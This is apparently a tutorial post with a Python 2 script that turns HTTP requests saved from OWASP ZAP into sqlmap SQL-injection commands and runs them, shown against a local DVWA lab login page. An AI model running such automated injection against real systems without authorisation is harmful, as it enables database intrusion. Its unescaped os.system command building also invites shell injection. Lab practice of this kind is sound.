Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.
This is an example of an HTTP POST request during the login stage of getting into DVWA. Then inside this box you can right-click, hover over Save Raw, Request, and then click on All. This will bring up a save dialog box. Where you saved the below script, create a folder called "requests". Then save the HTTP Request in that folder. If you are running Kali you do not need to be root to execute this script.
Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:
#!/usr/bin/python
import os
import sys
additionalParameters='--dbms=mysql --level=5 --risk=3'
def checkDir():
if not (os.path.exists("requests")):
print "This must be the first time you have used this script."
print
print "Creating a directory called 'requests'. This is where"
print "you can save the web requests you would like formatted"
print "for sqlmap."
print
os.makedirs("requests")
def getFileName():
if (len(os.listdir('requests')) == 0):
print "Inside this directory is another directory called requests."
print "Currently this directory is empty, please add to this directory"
print "the saved web requests that you would like formatted for sqlmap."
print
print "Example: In OWASP ZAP 2.4 where the web request is located,"
print "change the display to be combined with the header and the"
print "body. Then right-click and Save Raw --> Request --> All."
print "Then navigate to the requests directory and save it. You"
print "can save more than one file and then select which one to"
print "format."
print
else:
print "Select which file to format:"
files = os.listdir('requests')
count = 1
for f in files:
print str(count) + ". " + f
count += 1
print
fileNum = raw_input ("$ ")
fileNum = int(fileNum) - 1
return files[fileNum]
def parseFilename(fileName):
fileName = 'requests/' + fileName
file = open(fileName, 'r')
# Count the number of lines in the file
lineCount = 0
for count in file:
lineCount += 1
file = open(fileName, 'r')
count = 0
requestType = ''
cookieInfo = ''
for line in file:
count += 1
if "POST" in line:
lineList = line.split(' ')
requestType = lineList[0]
url = lineList[1]
elif "GET" in line:
lineList = line.split(' ')
requestType = lineList[0]
url = lineList[1]
elif "User-Agent: " in line:
userAgent = line[12:-2]
elif "Cookie: " in line:
cookieInfo = line[8:-2]
elif (count == lineCount) & (requestType == 'POST'):
dataInfo = line
dataInfo = dataInfo[:-2]
print
sqlMapString = "sqlmap -u '"
sqlMapString += url + "' "
if (requestType == 'POST'):
sqlMapString += "--data='" + dataInfo + "' "
if (cookieInfo <> ''):
sqlMapString += "--cookie='" + cookieInfo + "' "
sqlMapString += "--headers='" + userAgent + "' "
sqlMapString += " " + additionalParameters
print
print "# Additional Parameters of " + additionalParameters
print "# These can be modified in the first few lines of the script"
print
print sqlMapString
print
return sqlMapString
def executeCommand(c):
raw_input ("Hit any key to execute the above sqlmap command.")
os.system(c)
def main():
print
print "## SQLMap Format Script"
checkDir()
openFilename = getFileName()
sqlmapCommand = parseFilename(openFilename)
executeCommand(sqlmapCommand)
if __name__ == "__main__":
main()
After you execute the above script you get the following output:
$ ./sqlmap-tool.py
## SQLMap Format Script
Select which file to format:
1. requests-1678.raw
2. requests-1665.raw
3. requests-1664.raw
$ 1
# Additional Parameters of --dbms=mysql --level=5 --risk=3
# These can be modified in the first few lines of the script
sqlmap -u 'http://127.0.0.1/dvwa/login.php' --data='username=admin&password=password&Login=Log' --cookie='security=high; PHPSESSID=ec135ql5k3j6irk2j0ammp5l94' --headers='Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0' --dbms=mysql --level=5 --risk=3
Hit any key to execute the above sqlmap command.
If you place more than one file in the 'requests' directory, as shown above you can choose which file you would like to format and then upon key press execute the command. One item to note is the additional parameters. These can be adjusted by modifying the respective line in the python script.